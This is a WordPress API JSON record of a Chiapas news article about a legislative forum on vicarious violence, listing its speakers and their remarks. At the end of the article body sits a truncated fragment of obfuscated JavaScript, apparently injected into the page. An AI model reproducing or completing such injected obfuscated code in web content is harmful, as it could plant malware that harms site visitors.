{"id":3108,"date":"2022-06-22T02:27:45","date_gmt":"2022-06-22T02:27:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3108"},"modified":"2022-06-22T02:27:47","modified_gmt":"2022-06-22T02:27:47","slug":"realiza-congreso-y-seigen-foro-sobre-violencia-vicaria","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3108","title":{"rendered":"Realiza Congreso y SEIGEN Foro sobre Violencia Vicaria"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"570\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0075.jpg\" alt=\"\" class=\"wp-image-3109\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0075.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0075-300x167.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0075-768x428.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 21 de junio de 2022.- El Honorable Congreso del Estado en conjunto con la Secretar\u00eda de Igualdad de G\u00e9nero en Chiapas, llevaron a cabo el Foro Hibrido denominado &#8221; Violencia Vicaria. Chiapas: an\u00e1lisis y contexto.Las participantes en este Foro destacaron que la violencia vicaria es aquella que tiene como objetivo da\u00f1ar a la mujer a trav\u00e9s de sus seres queridos y especialmente de sus hijas e hijos. La diputada Elizabeth Escobedo Morales, presidenta de la Comisi\u00f3n de Igualdad de G\u00e9nero del Congreso del Estado se\u00f1al\u00f3 que con estos foros se busca que la sociedad est\u00e9 m\u00e1s informada sobre este tema, el cual tambi\u00e9n se requiere de la uni\u00f3n de las instituciones, de los Poderes del Estado, de la sociedad en su conjunto, que se tome conciencia de esta violencia de g\u00e9nero\u201d. Agrego que \u201ces importante que juntas y juntos encaminemos estos trabajos a fin de sumar y concientizar para lograr que en nuestra legislaci\u00f3n se contemple este tipo de violencia y se tipifique en materia de Reconocimiento y Sanci\u00f3n de la Violencia Vicaria\u201d.Por su parte, la presidenta de la Mesa Directiva, Mar\u00eda de los \u00c1ngeles Trejo Huerta, reconoci\u00f3 que para el Congreso es importante se tome conciencia y se act\u00fae por los derechos e igualdad, se necesita -dijo- avanzar, ya que como legisladores el tema de la erradicaci\u00f3n de la violencia est\u00e1 contemplado en la agenda parlamentaria.El presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica, Yamil Melgar Bravo, anot\u00f3 que el foro da mayor conocimiento del tema para sensibilizar a todos los actores y ahora al sumar al Congreso en esta acci\u00f3n, se lograr\u00e1 aportar en la erradicaci\u00f3n de la desigualdad y la discriminaci\u00f3n.La diputada Floralma G\u00f3mez Santis, Presidenta de la Comisi\u00f3n de Atenci\u00f3n a la Mujer y la Ni\u00f1ez , apunt\u00f3 que hay que seguir hablando de estos temas, visibilizarlos para as\u00ed atenderlos, ejemplific\u00f3 que los casos m\u00e1s fuertes ocurren en las zonas rurales e ind\u00edgenas.La legisladora Karina Margarita del R\u00edo Zenteno, Presidenta de la Comisi\u00f3n de Transparencia e Informaci\u00f3n P\u00fablica, se\u00f1al\u00f3 que con este tipos de foros sirva para aprobar la iniciativa que se present\u00f3 y con ello hacer justicia hacia las mujeres, ni\u00f1as y ni\u00f1os. Hay un compromiso de escuchar a los m\u00e1s vulnerables, recalc\u00f3.Asimismo la Secretaria de Igualdad de G\u00e9nero, Mar\u00eda Mandiola Totoricaguena, agreg\u00f3 que las mujeres tienen el derecho a vivir una vida libre de violencia, por ello desde la SEIGEN se impulsan programas, se trabaja a favor de las mujeres, de la ni\u00f1ez y adolescentes.En este evento participaron de manera virtual desde Espa\u00f1a, la psic\u00f3loga cl\u00ednica y especialista en Victimolog\u00eda Sonia Vaccaro, qui\u00e9n acu\u00f1o el nombre de Violencia Vicaria; diputada Juanita Gonz\u00e1lez del estado de Nayarit; diputada, Ana Francis L\u00f3pez Bayghen de la CDMX; diputada Gabriela Mart\u00ednez Larrea de San Luis Potos\u00ed; Mayte L\u00f3pez Garc\u00eda , Cofundadora e Integrante del Frente Nacional contra la Violencia Vicaria; De manera presencial, Micaela Giacobone Schwartz, Integrante de VIMOR e impulsora a nivel nacional de la Ley contra la Violencia Vicaria. Eileen Leticia Rodr\u00edguez L\u00f3pez, del Frente contra la Violencia Vicaria Capitulo, Chiapas.La panelista Sonia Vaccaro desde Espa\u00f1a, psic\u00f3loga cl\u00ednica y especialista en victimolog\u00eda, argument\u00f3 ante los presentes lo que es la Violencia Vicaria.Micaela Guiacobone Schwartz, impulsora de la Ley Nacional contra la Violencia Vicaria e integrante de Vivir con Amor, Red de Apoyo para Mujeres V\u00edctimas de Violencia, relato las formas y lo que viven d\u00eda a d\u00eda las mujeres con este tipo de violencia y porque la necesidad de legislar al respecto.Eileen Rodr\u00edguez L\u00f3pez, dio a conocer por la situaci\u00f3n que ha pasado y agradeci\u00f3 la realizaci\u00f3n de estos foros, toda vez que es importante que pronto se apruebe la ley sobre violencia vicaria.Asistieron los legisladores: Sonia Catalina \u00c1lvarez, Paola Villamonte P\u00e9rez, Mar\u00eda Diego Reyes G\u00f3mez, Rub\u00e9n Zuarth Esquinca, Carolina Zuarth Ramos, Roc\u00edo Cervantes Cancino, Martha Guadalupe Mart\u00ednez Ru\u00edz, Petrona de la Cruz Cruz, Leticia Albores Ru\u00edz, Flor Esponda Torres, Cecilia L\u00f3pez S\u00e1nchez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 21 de junio de 2022.- El Honorable Congreso del Estado en conjunto con la Secretar\u00eda de Igualdad de G\u00e9nero en Chiapas, llevaron a cabo el Foro Hibrido denominado &#8221; Violencia Vicaria. Chiapas: an\u00e1lisis y contexto.Las participantes en este Foro destacaron que la violencia vicaria es aquella que tiene como objetivo da\u00f1ar a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3109,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3108","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3108"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3108\/revisions"}],"predecessor-version":[{"id":3110,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3108\/revisions\/3110"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3109"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}